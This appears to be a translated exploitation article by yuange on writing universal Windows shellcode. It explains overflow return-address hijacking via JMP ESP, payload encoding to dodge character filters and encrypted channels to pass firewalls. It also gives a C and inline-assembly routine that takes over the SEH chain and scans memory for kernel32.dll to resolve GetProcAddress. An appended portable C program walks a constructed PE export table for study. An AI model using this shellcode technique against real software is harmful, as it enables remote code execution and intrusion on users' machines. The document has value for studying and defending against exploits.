Advanced Techniques for Writing Windows Shellcode

Author: yuange (mailto: yuange@nsfocus.com)
Home: http://www.nsfocus.com/

    On Unix and similar systems there is a notion of users, so an overflow is usually used first to obtain an ordinary account, and then, after logging in, a local overflow is used to load a shell and obtain root privileges. System calls there are convenient, so the shellcode is generally fairly simple. A Windows system usually provides no login service, so the shellcode delivered through an overflow often has to provide a socket connection itself and load a program in order to obtain a shell. Moreover, the Windows int 2e interface is not standardized the way the Unix int 80 system call is, so the API is normally used instead, and API function addresses differ between system versions. Writing practical, general-purpose shellcode for Windows is therefore considerably more troublesome.

    After some thought, I arrived at a better way to write shellcode under Windows:

    1. Determining the overflow point. The overflow is used to overwrite a RET instruction address, so only the approximate range of the overflow point needs to be known.
    2. Locating the shellcode. The ESP register is used for positioning: as long as the RET address overwritten earlier points to a JMP ESP instruction, the shellcode can be located.
    3. The RET instruction address. The address used is that of a JMP ESP-style instruction, i.e. the byte sequence 54 C3 (push esp / ret) or FF E4 (jmp esp). Such an address is fixed in Windows, and it is also very easy to find.
    4. The shellcode is written directly in C, which makes it easy to write, modify and debug.
    5. The shellcode is encoded uniformly so that it meets the application's restrictions on shellcode characters; with a small piece of assembly decoding code, shellcode can be written without worrying about special characters.
    6. Communication is encrypted to deal with firewalls, an FTP function is implemented, and, as an advanced application, the Web service is taken over directly in memory.

    The following mainly introduces a way to write universal shellcode. The APIs used in the main body of the shellcode are located with GetProcAddress, and libraries are loaded with LoadLibraryA, so the shellcode depends on only these two APIs. How are the addresses of these two APIs resolved? LoadLibraryA lives in the system library kernel32.dll, and GetProcAddress can be obtained from it as well, so the problem reduces to finding the system library kernel32.dll and the address of GetProcAddress. Since virtually every application loads kernel32.dll, the solution is to search memory for this system library and the API address. Fortunately, I know the Windows module data structures, so this is not difficult; the main addition is handling of the exception structures. Below is a VC6.0 program:

void shellcodefn()
{
    int       *except[3];
    FARPROC   procgetadd = 0;
    char      *stradd;
    int       imgbase, fnbase, i, k, l;
    HINSTANCE libhandle;

    _asm {
        jmp  nextcall
getstradd:
        pop  stradd
        lea  edi, except
        mov  eax, dword ptr fs:[0]
        mov  dword ptr [edi+0x08], eax
        mov  dword ptr fs:[0], edi
    }
    except[0] = (int *)0xffffffff;          /* -1 marks the end of the SEH chain */
    except[1] = (int *)(stradd - 0x07);     /* handler: execptprogram, 7 bytes before stradd */
    /* Save the exception registration chain and install our own record:
       the shellcode takes over exception handling */

    imgbase = 0x77e00000;
    /* Search for the starting address of kernel32.dll */

    _asm {
        call getexceptretadd
    }
    /* Obtain the exception return address (the start of the loop below) */
    for (; imgbase < 0xbffa0000 && procgetadd == 0;) {
        imgbase += 0x10000;
        /* Module addresses are 64K-aligned, so step by 64K to speed up the search */
        if (imgbase == 0x78000000) imgbase = 0xbff00000;
        /* If nothing is found in this range it may be a Win9x system */
        if (*(WORD *)imgbase == 'ZM' &&
            *(WORD *)(imgbase + *(int *)(imgbase + 0x3c)) == 'EP') {
            /* Module header: "MZ" at the base, "PE" at e_lfanew */
            fnbase = *(int *)(imgbase + *(int *)(imgbase + 0x3c) + 0x78) + imgbase;
            /* Export directory */
            k = *(int *)(fnbase + 0xc) + imgbase;
            if (*(int *)k == 'NREK' && *(int *)(k + 4) == '23LE') {
                /* Module name "KERNEL32" */
                libhandle = (HINSTANCE)imgbase;
                /* The module header address is the module handle */
                k = imgbase + *(int *)(fnbase + 0x20);
                /* AddressOfNames */
                for (l = 0; l < *(int *)(fnbase + 0x18); l++, k += 4) {
                    if (*(int *)(imgbase + *(int *)k) == 'Pteg' &&
                        *(int *)(4 + imgbase + *(int *)k) == 'Acor') {
                        /* Matched the export name "GetProcA..." */
                        k = *(WORD *)(l + l + imgbase + *(int *)(fnbase + 0x24));
                        /* AddressOfNameOrdinals entry for this name */
                        k += *(int *)(fnbase + 0x10) - 1;
                        /* The ordinal table is unbiased; for a module whose ordinal base is 1 this adds zero */
                        k = *(int *)(k + k + k + k + imgbase + *(int *)(fnbase + 0x1c));
                        /* AddressOfFunctions[k] */
                        procgetadd = (FARPROC)(k + imgbase);
                        /* API address */
                        break;
                    }
                }
            }
        }
    }
    /* Search for the kernel32.dll module address and the address of the API function
       GetProcAddress. Note the handling of the case where a page is not mapped. */

    _asm {
        lea  edi, except
        mov  eax, dword ptr [edi+0x08]
        mov  dword ptr fs:[0], eax
    }
    /* Restore the exception registration chain */

    if (procgetadd == 0) goto die;
    /* If the GetProcAddress address was not found, loop forever */
die:
    goto die;
    /* (the rest of the payload, not shown in this fragment, would sit between the check and this label) */

    _asm {
getexceptretadd:
        pop  eax
        push eax
        mov  edi, dword ptr [stradd]
        mov  dword ptr [edi-0x0e], eax
        ret
        /* Obtain the exception return address and patch it into the exception handler below */

        /* Exception handler */
errprogram:
        mov  eax, dword ptr [esp+0x0c]
        add  eax, 0xb8
        mov  dword ptr [eax], 0x11223344   // immediate lives at stradd-0xe
        /* Modify the EIP in the exception CONTEXT so execution resumes in the search loop */
        xor  eax, eax                      // 2 bytes
        /* Return 0 (ExceptionContinueExecution): no exception dialog */
        ret                                // 1 byte
        /* Return from the exception handler */
execptprogram:
        jmp  errprogram                    // 2 bytes, at stradd-7
nextcall:
        call getstradd                     // 5 bytes
    }
}
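As an added example that is not from the original article, the following C program performs the same export-directory walk as the shellcode above, but on a constructed in-memory PE image rather than on live process memory, so it runs on any host and lets a reader check the header offsets (0x3c, PE+0x78, export +0x0c/+0x10/+0x18/+0x1c/+0x20/+0x24) against the PE format. It compares the whole export name rather than the first eight bytes, bounds-checks every read the shellcode performs unchecked, and indexes the ordinal table as the unbiased array it is. The function names, the layout of the constructed image and the sample RVAs are my own assumptions.

```c
/* Added example (not from the original article): walk the export directory of a
 * PE image held in memory, using the same header offsets the shellcode above
 * relies on, to resolve the RVA of a named export. The image is a constructed
 * minimal PE laid out as a memory image (file offset == RVA), so the code runs
 * stand-alone on any host; only the fields the walk touches are filled in. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IMG_SIZE 0x400

/* Explicit little-endian reads/writes: the shellcode does these with casts such
 * as *(int *) and *(WORD *); written portably here so the example runs anywhere. */
static uint32_t rd32(const uint8_t *p) {
    return p[0] | (p[1] << 8) | (p[2] << 16) | ((uint32_t)p[3] << 24);
}
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static void wr32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }

/* Resolve an export by name and return its RVA (0 if the buffer is not a PE image
 * or the name is absent). Offsets, all from the PE format:
 *   0x3c           e_lfanew (offset of the "PE" signature)
 *   PE + 0x78      RVA of the export directory (first data directory entry)
 *   export + 0x0c  RVA of the module name string
 *   export + 0x10  ordinal base
 *   export + 0x18  NumberOfNames
 *   export + 0x1c  AddressOfFunctions, +0x20 AddressOfNames, +0x24 AddressOfNameOrdinals
 * Each bounds check guards a read the shellcode performs unchecked. */
uint32_t find_export_rva(const uint8_t *img, size_t len, const char *name,
                         char *modname, size_t modlen)
{
    if (len < 0x40 || img[0] != 'M' || img[1] != 'Z') return 0;
    uint32_t pe = rd32(img + 0x3c);
    if (pe + 0x7c > len || img[pe] != 'P' || img[pe + 1] != 'E') return 0;
    uint32_t exp = rd32(img + pe + 0x78);
    if (exp == 0 || exp + 0x28 > len) return 0;
    const uint8_t *ed = img + exp;
    uint32_t name_rva = rd32(ed + 0x0c), nnames = rd32(ed + 0x18);
    uint32_t funcs = rd32(ed + 0x1c), names = rd32(ed + 0x20), ords = rd32(ed + 0x24);
    if (modname && name_rva < len) snprintf(modname, modlen, "%s", (const char *)img + name_rva);
    for (uint32_t i = 0; i < nnames; i++) {
        if (names + 4 * i + 4 > len || ords + 2 * i + 2 > len) return 0;
        uint32_t s = rd32(img + names + 4 * i);
        if (s >= len) return 0;
        if (strcmp((const char *)img + s, name) == 0) {
            /* AddressOfNameOrdinals holds unbiased indexes into AddressOfFunctions,
             * so no ordinal-base arithmetic is needed (the article's "+ base - 1"
             * adds zero for kernel32, whose ordinal base is 1). */
            uint32_t idx = rd16(img + ords + 2 * i);
            if (funcs + 4 * idx + 4 > len) return 0;
            return rd32(img + funcs + 4 * idx);
        }
    }
    return 0;
}

/* Constructed image: three exports whose name table is sorted (as the real loader
 * requires) while the ordinal table maps them to function slots out of order, so a
 * lookup that skipped the ordinal indirection would return the wrong RVA. */
void build_image(uint8_t *img)
{
    memset(img, 0, IMG_SIZE);
    img[0] = 'M'; img[1] = 'Z';
    wr32(img + 0x3c, 0x80);                /* e_lfanew */
    img[0x80] = 'P'; img[0x81] = 'E';
    wr32(img + 0x80 + 0x78, 0x200);        /* export directory RVA */
    uint8_t *ed = img + 0x200;
    wr32(ed + 0x0c, 0x300);                /* module name */
    wr32(ed + 0x10, 1);                    /* ordinal base */
    wr32(ed + 0x14, 3);                    /* NumberOfFunctions */
    wr32(ed + 0x18, 3);                    /* NumberOfNames */
    wr32(ed + 0x1c, 0x240);                /* AddressOfFunctions */
    wr32(ed + 0x20, 0x250);                /* AddressOfNames */
    wr32(ed + 0x24, 0x260);                /* AddressOfNameOrdinals */
    strcpy((char *)img + 0x300, "KERNEL32.dll");
    wr32(img + 0x240, 0x1000);             /* function slot 0 */
    wr32(img + 0x244, 0x2000);             /* function slot 1 */
    wr32(img + 0x248, 0x3000);             /* function slot 2 */
    const char *names[3] = { "ExitProcess", "GetProcAddress", "LoadLibraryA" };
    const uint16_t slots[3] = { 2, 0, 1 }; /* ExitProcess->0x3000, GetProcAddress->0x1000, LoadLibraryA->0x2000 */
    for (int i = 0; i < 3; i++) {
        strcpy((char *)img + 0x310 + 0x10 * i, names[i]);
        wr32(img + 0x250 + 4 * i, 0x310 + 0x10 * i);
        wr16(img + 0x260 + 2 * i, slots[i]);
    }
}

/* Look up one name in the constructed image. */
uint32_t demo_lookup(const char *name, char *modname, size_t modlen)
{
    static uint8_t img[IMG_SIZE];
    build_image(img);
    return find_export_rva(img, IMG_SIZE, name, modname, modlen);
}

/* 1 if the module name read from the constructed image equals expected. */
int demo_modname_is(const char *expected)
{
    char mod[32];
    demo_lookup("GetProcAddress", mod, sizeof mod);
    return strcmp(mod, expected) == 0;
}

int main(void)
{
    const char *probe[] = { "GetProcAddress", "LoadLibraryA", "ExitProcess", "NotExported" };
    for (int i = 0; i < 4; i++)
        printf("%-16s -> RVA 0x%x\n", probe[i], demo_lookup(probe[i], NULL, 0));
    printf("module name is KERNEL32.dll: %s\n", demo_modname_is("KERNEL32.dll") ? "yes" : "no");
    return 0;
}
```

Compile with any C compiler; no Windows headers are needed. Because the constructed name table is sorted while the ordinal table permutes the function slots, a walker that ignores AddressOfNameOrdinals returns the wrong slot, which is the check worth keeping in mind when reviewing hand-written export walkers such as the one above.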